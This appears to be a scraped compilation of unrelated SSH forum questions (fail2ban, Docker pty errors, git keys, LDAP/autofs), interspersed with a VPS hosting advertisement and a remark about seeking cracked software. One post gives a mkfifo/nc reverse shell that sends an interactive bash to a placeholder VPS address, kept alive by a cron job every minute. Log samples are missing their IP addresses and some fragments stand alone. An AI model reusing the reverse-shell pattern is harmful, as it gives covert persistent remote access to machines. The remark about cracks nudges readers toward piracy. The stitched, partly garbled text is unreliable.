Modern SSH client (Windows, Mac, and mobile)

check out ->
It is free, but you have to pay to unlock more features. I couldn't find a crack for Windows, though there are cracks for Mac and Android.

ssh – fail2ban not working with SSHD

I am running fail2ban (0.9.6-2) on Debian 9 with busybox-syslogd logging to /var/log/auth.log,
set up with the following line in /etc/rc.local to get logs written to a file:

/sbin/syslogd -O /var/log/auth.log || exit 1

The sshd jail is enabled but does not see failed login attempts.

Running fail2ban-regex on the auth.log file with the sshd filter reports no matches.

sshd_config is set to SyslogFacility AUTHPRIV and LogLevel VERBOSE.

Here is a sample of auth.log:

Jan 14 17:12:41 Fire-Video sshd[2556]: Failed none for video from port 56068 ssh2
Jan 14 17:12:42 Fire-Video sshd[2556]: Failed password for video from port 56068 ssh2
Jan 14 17:12:42 Fire-Video sshd[2556]: Failed password for video from port 56068 ssh2
Jan 14 17:12:42 Fire-Video sshd[2556]: Connection closed by port 56068 [preauth]
Jan 14 17:12:49 Fire-Video sshd[2558]: Connection from port 56074 on port 22
Jan 14 17:12:53 Fire-Video authpriv.debug sshd[2558]: pam_usermapper(sshd:auth): pam_sm_authenticate flags: 00000001
Jan 14 17:12:53 Fire-Video authpriv.notice sshd[2558]: pam_usermapper(sshd:auth): aliasing to 'root'
Jan 14 17:12:53 Fire-Video authpriv.notice sshd[2558]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=  user=root
Jan 14 17:12:55 Fire-Video sshd[2558]: Failed password for video from port 56074 ssh2
Jan 14 17:13:15 Fire-Video authpriv.debug sshd[2558]: pam_usermapper(sshd:auth): pam_sm_authenticate flags: 00000001
Jan 14 17:13:16 Fire-Video sshd[2558]: Failed password for video from port 56074 ssh2
Jan 14 17:13:21 Fire-Video authpriv.debug sshd[2558]: pam_usermapper(sshd:auth): pam_sm_authenticate flags: 00000001
Jan 14 17:13:21 Fire-Video sshd[2558]: Accepted password for video from port 56074 ssh2
Jan 14 17:13:21 Fire-Video sshd[2558]: pam_unix(sshd:session): session opened for user root by (uid=0)
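As a quick sanity check (a minimal sketch using a deliberately simplified stand-in for the filter's "Failed ... from <HOST>" pattern, not the real fail2ban regex), note that the sample lines have nothing between "from" and "port" where the client IP should be, so there is no <HOST> for the filter to capture:

```shell
# One of the sample lines, verbatim: no IP between "from" and "port"
line='Jan 14 17:12:42 Fire-Video sshd[2556]: Failed password for video from port 56068 ssh2'
# Simplified stand-in for the "Failed ... from <HOST> port ..." pattern
pat='Failed [^ ]+ for .* from ([0-9]{1,3}\.){3}[0-9]{1,3} port [0-9]+'
if printf '%s\n' "$line" | grep -Eq "$pat"; then
  echo "matched"
else
  echo "no match"   # nothing for <HOST> to capture, so fail2ban records no failure
fi
```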

This is my sshd.conf in filter.d:

    # PasswordAuthentication in sshd_config.
    # "Connection from <HOST> port \d+" requires LogLevel VERBOSE in sshd_config
    # Read common prefixes. If any customizations available -- read them from
    # common.local
    before = common.conf
    _daemon = sshd
    failregex = ^%(__prefix_line)s(?:error: PAM: )?[aA]uthentication (?:failure|error|failed) for .* from <HOST>( via \S+)?\s*$
                ^%(__prefix_line)s(?:error: PAM: )?User not known to the underlying authentication module for .* from <HOST>\s*$
                ^%(__prefix_line)sFailed \S+ for (?P<cond_inv>invalid user )?(?P<user>(?P<cond_user>\S+)|(?(cond_inv)(?:(?! from ).)*?|[^:]+)) from <HOST>(?: port \d+)?(?: ssh\d*)?(?(cond_user):|(?:(?:(?! from ).)*)$)
                ^%(__prefix_line)sROOT LOGIN REFUSED.* FROM <HOST>\s*$
                ^%(__prefix_line)s[iI](?:llegal|nvalid) user .*? from <HOST>(?: port \d+)?\s*$
                ^%(__prefix_line)sUser .+ from <HOST> not allowed because not listed in AllowUsers\s*$
                ^%(__prefix_line)sUser .+ from <HOST> not allowed because listed in DenyUsers\s*$
                ^%(__prefix_line)sUser .+ from <HOST> not allowed because not in any group\s*$
                ^%(__prefix_line)srefused connect from \S+ \(<HOST>\)\s*$
                ^%(__prefix_line)s(?:error: )?Received disconnect from <HOST>: 3: .*: Auth fail(?: \[preauth\])?$
                ^%(__prefix_line)sUser .+ from <HOST> not allowed because a group is listed in DenyGroups\s*$
                ^%(__prefix_line)sUser .+ from <HOST> not allowed because none of user's groups are listed in AllowGroups\s*$
                ^(?P<__prefix>%(__prefix_line)s)User .+ not allowed because account is locked<SKIPLINES>(?P=__prefix)(?:error: )?Received disconnect from <HOST>: 11: .+ \[preauth\]$
                ^(?P<__prefix>%(__prefix_line)s)Disconnecting: Too many authentication failures for .+? \[preauth\]<SKIPLINES>(?P=__prefix)(?:error: )?Connection closed by <HOST> \[preauth\]$
                ^(?P<__prefix>%(__prefix_line)s)Connection from <HOST> port \d+(?: on \S+ port \d+)?<SKIPLINES>(?P=__prefix)Disconnecting: Too many authentication failures for .+? \[preauth\]$
                ^%(__prefix_line)s(error: )?maximum authentication attempts exceeded for .* from <HOST>(?: port \d*)?(?: ssh\d*)? \[preauth\]$
                ^%(__prefix_line)spam_unix\(sshd:auth\):\s+authentication failure;\s*logname=\S*\s*uid=\d*\s*euid=\d*\s*tty=\S*\s*ruser=\S*\s*rhost=<HOST>\s.*$
    ignoreregex =
    # "maxlines" is number of log lines to buffer for multi-line regex searches
    maxlines = 10
    journalmatch = _SYSTEMD_UNIT=sshd.service + _COMM=sshd

# DEV Notes:
#   "Failed \S+ for .*? from <HOST>..." failregex uses non-greedy catch-all because
#   it is coming before use of <HOST> which is not hard-anchored at the end as well,
#   and later catch-all's could contain user-provided input, which need to be greedily
#   matched away first.
# Author: Cyril Jaquier, Yaroslav Halchenko, Petr Voralek, Daniel Black
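For completeness, the jail side also has to point at the file busybox-syslogd writes; a minimal jail sketch (the backend choice is an assumption on my part, since there is no systemd journal to follow in this setup):

```ini
[sshd]
enabled = true
port    = ssh
logpath = /var/log/auth.log
# plain file written by busybox syslogd; no systemd journal available
backend = polling
```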

docker – SSH fails to create a pseudo terminal

Our company's product is an application that runs in a container. It listens on port 2222 to provide a command-line interface.

A customer is having issues with SSH. We have never seen this issue before and cannot reproduce it with the exact same OS (RHEL 7.8), Docker version (RHEL-packaged 1.13.1), and container (our app, same version).

When they do:

ssh -p 2222 <user>@<ip>

The errors they see client-side are:

"server refused to allocate pty" or "PTY allocation request failed on channel 0"

The error logs within our app (server) are:

openpty: Operation not permitted
session_pty_req: session 0 alloc failed
pam_unix(sshd:session): session closed for user <>

Googling this, one possibility is incorrect permissions on /dev/pts, /dev/pts/ptmx, or /dev/ptmx, but they are correct here.

Another possibility is that the devpts mount is missing gid=5. I checked, and the mounts look correct on both the host and the container.

# Host
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0
# Container
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0

I've cross-checked my system against the customer's. It all looks to match, but obviously something is wrong.

Another data point: currently they run the container using docker run --user 100001:0 ..., i.e. user-id 100001, group-id 0 (root). If instead they run the container as root (docker run --user 0:0 ...), the issue does not occur. It's a permissions issue somewhere.
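If anyone wants to gather more data, here is a small diagnostic sketch to run inside the container as the non-root user (the paths are the standard Linux pty device nodes; nothing here is specific to our app):

```shell
echo "--- pty device nodes ---"
# openpty() ultimately opens /dev/ptmx; check both it and the devpts ptmx node
ls -l /dev/ptmx /dev/pts/ptmx 2>&1
echo "--- devpts mount options ---"
grep devpts /proc/mounts || echo "devpts not mounted"
```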

Has anyone encountered this before?

Any hints would be much appreciated as I’m out of ideas.

ssh for git, users and permissions

I am setting up a git repository on my local network using SSH authentication, and am trying to find some background on how it works.

I can ssh as ‘user’ from ‘my-workstation’ to ‘gitserver’ using pubkey authentication.

I copied the SSH keys for 'user' from 'my-workstation' to the git user's .ssh directory on 'gitserver':

root@gitserver/srv # ls -l
drwxrwx---. 7 git git 4.0K 06/01/21 08:35 git

root@gitserver/srv # ls -ld git/.ssh/
drwx------. 2 git git 28 Jan 3 12:12 git/.ssh/

root@gitserver/srv # ls -l git/.ssh/
-rw-------. 1 git git 1.8K 03/01/21 21:45 authorized_keys

How does this work when ssh thinks I am the 'git' user, with commands like:

$ git remote add origin git@gitserver:/srv/git/project.git

I don't understand how SSH keys for 'user' can allow SSH authentication as user 'git'.
Also, all the permissions for the repository on 'gitserver' are for user 'git', not user 'user'.
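One thing worth checking, prompted by the listing above: drwxrwx--- on the git home directory is group-writable, and with the default StrictModes yes, sshd silently ignores an authorized_keys file that sits under a group- or world-writable path. A minimal sketch of the permissions pubkey auth expects (the temp directory stands in for /srv/git):

```shell
home=$(mktemp -d)              # stand-in for the git account's home, e.g. /srv/git
mkdir -p "$home/.ssh"
touch "$home/.ssh/authorized_keys"
chmod 755 "$home"              # home dir: must not be group/world-writable
chmod 700 "$home/.ssh"
chmod 600 "$home/.ssh/authorized_keys"
stat -c '%a %n' "$home" "$home/.ssh" "$home/.ssh/authorized_keys"   # 755 / 700 / 600
```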

Trying to understand how this could possibly work ….

(it doesn’t !)


OpenVZ VPS Hosting + Root/SSH Access + Free Setup + 99% Uptime, from $14.99/month | NewProxyLists is a perfect hosting company to get simple, fast, and secure hosting services that allow you to take your business to the next level. We offer a wide range of web hosting services, from shared hosting and reseller hosting to OpenVZ VPS and dedicated servers. We're committed to providing the highest level of customer support across all of our offerings.

All our VPS hosting plans include control panel installation and setup, full root access, a dedicated IP, free rDNS, and free re-installations. Just sign up and be online within the hour with our instant, free setup!

We offer a 30-day money-back guarantee if you are not 100% satisfied with our service.

VPS Plans

Startup: $14.99/month

★ 1024 MB Memory
★ 30 GB Raid 10 Storage
★ 2 TB Monthly Traffic
★ 1 IPv4 included
★ Free Setup

Pro: $24.99/month

★ 2048 MB Memory
★ 60 GB Raid 10 Storage
★ 3 TB Monthly Traffic
★ 1 IPv4 included
★ Free Setup

Premium: $44.99/month

★ 4096 MB Memory
★ 120 GB Raid 10 Storage
★ 4 TB Monthly Traffic
★ 1 IPv4 included
★ Free Setup

Elite: $84.99/month

★ 8192 MB Memory
★ 180 GB Raid 10 Storage
★ 8 TB Monthly Traffic
★ 1 IPv4 included
★ Free Setup


For more Hosting plan details, please visit:

In case you have any questions, you can contact our sales department by initiating a chat or by dropping an email to

google cloud compute – keep an SSH service running even when the computer is turned off

I think the current workload is going to be hosed unless the program can be run in the background while it's still running.

Right now you are running it in the foreground, hence why the SSH session has to stay open.

Though there may not be a way to "save it", in the future you could use something like tmux. That said, since the job is already running, I am not sure you can attach a tmux session to your active session for it to "switch to".
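To make the idea concrete, here is a minimal sketch using nohup as a stand-in (it needs no extra packages; with tmux you would instead start the job inside tmux new -d -s work '...', where the session name is hypothetical):

```shell
# Detach a job from the terminal so it survives the SSH session ending
log=$(mktemp)
nohup sh -c "echo started > $log" >/dev/null 2>&1 &
wait               # in real use you would simply log out instead of waiting
cat "$log"         # prints: started
```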

ssh – Can’t connect to nc on VPS Please review

I’ve set up a connection on my own personal machine, using this code:


n=$(ps aux | grep -o '[1]234')

if [[ $n = "" ]]; then
  mkfifo f
  nc VPS_IP_ADDRESS_HERE 1234 < f | /bin/bash -i > f 2>&1
fi

I want to connect to it from another machine on a different network, so I bought a VPS! I replaced the text "VPS_IP_ADDRESS_HERE" with the IP address of my VPS. Then I made sure to give the script permissions with "chmod 777 /etc/whatever". I also set up a crontab to make sure the bash script runs every minute, set to the following code:
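For reference, the [1]234 bracket class in the grep above is the usual trick to stop grep from matching its own command line in the ps output; a self-contained illustration (no live processes involved):

```shell
# '[1]234' matches the text "1234" ...
printf '1234\n' | grep -o '[1]234'            # prints: 1234
# ... but not the literal text "[1]234", so a grep whose own
# command line shows up in the ps output will not match itself
printf '[1]234\n' | grep -c '[1]234' || true  # prints: 0
```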

Now, on a different machine, I SSHed into the VPS and ran the command "nc -l -p 1234", but no connection happened! Please help!

Open and sync gnome-terminal on ssh connect

I want to open a gnome-terminal on the host when there is an incoming connection, and close it when the connection closes. For example, doing it manually:

Contents of HOST ~/.bashrc

if [[ -n $SSH_CONNECTION ]] ; then

1. HOST: Connect to client

Open new gnome-terminal on host by script in ~/.bashrc

ssh user@host

2. CLIENT: Get the file name of the terminal connected


e.g. /dev/pts/1

3. HOST: Connect terminals

exec &> >(tee >(cat >&/dev/pts/1))

4. HOST: Close Connection

5. CLIENT: manually close the gnome terminal window

Is it possible to implement this behavior in the CLIENT ~/.bashrc on every login, even if there are multiple clients connected? So that CLIENT ssh user@host creates a new gnome-terminal on HOST, syncs with that terminal, and closes the gnome-terminal when the connection is terminated, while keeping logs of all activity for the connections?
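The $SSH_CONNECTION test from the manual steps can be sketched as a complete, runnable fragment for the HOST ~/.bashrc (assuming bash; the gnome-terminal launch is reduced to an echo here so the logic stays visible):

```shell
if [[ -n $SSH_CONNECTION ]]; then
  # $SSH_CONNECTION holds "client_ip client_port server_ip server_port"
  client=${SSH_CONNECTION%% *}
  echo "incoming ssh session from $client"
  # a real version would launch gnome-terminal here and record $(tty)
fi
```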

Using LDAP: how to log in with SSH, mounting the Samba home directory with autofs?

I have spent some time setting up LDAP-based authentication on my macOS, iOS, and Linux network, taking account of the special quirks of macOS and Synology (my NAS). SSH login (SSH keys etc.) works, and Samba share mounts work. It was all quite fiddly, and I now know more about LDAP than I ever anticipated.


Having reached a point where I could (at least in theory) log into any machine in my network, I thought it would be nice for users to also have access to the same home directory everywhere. No problem: autofs, which can also be managed from LDAP! Or so I thought…

I’m trying something like the following to set up Samba home directories for autofs:

cn: &
objectClass: automount
objectClass: top
automountInformation: -fstype=cifs,vers=3.0,domain=HOME,rw,username=&,uid=&,gid=& ://s-sy-00.local/home

Some background:

  1. s-sy-00.local is my Synology NAS where the home directories will live.
  2. /home is the UNC path of the home directory share that Synology serves for the user defined in username=.

The problems start when I log in to a remote machine with SSH. autofs tries to mount the user’s home directory, but needs the user’s password. I can put the password into a password= parameter in the automountInformation line, or I can put the username and the password into a credentials file that I pass with the credentials= parameter. Both approaches lead to added complexity (an automount entry for each user) and duplication (same username and password in two different places: LDAP and the credentials file or the automount and the posixUser in LDAP).
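For the record, the credentials-file variant from the paragraph above looks roughly like this (all names and the password are placeholders, and the temp directory stands in for wherever the files would really live; the duplication concern stands either way):

```shell
creddir=$(mktemp -d)             # stand-in for e.g. /etc/autofs/creds
cat > "$creddir/alice" <<'EOF'
username=alice
password=changeme
domain=HOME
EOF
chmod 600 "$creddir/alice"       # keep the file private to root
stat -c '%a' "$creddir/alice"    # prints: 600
# the automount entry would then carry: -fstype=cifs,credentials=<path>,...
```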

Is there a standard way of dealing with this problem? My search engine skills have not turned anything up yet.

It seems to me that there are three possible solutions:

  1. the one that is obvious to everyone else but not to me;
  2. using the SSH key to mount a credentials file per user (possibly dynamically generated from LDAP) from an SSHFS share;
  3. using Kerberos for a full-blown SSO.

I would prefer number 1 🙂 I have an aversion to Kerberos: it seems to be overkill and is certainly relatively complex.

Can anyone offer some words of wisdom to give me a flying start into the new year?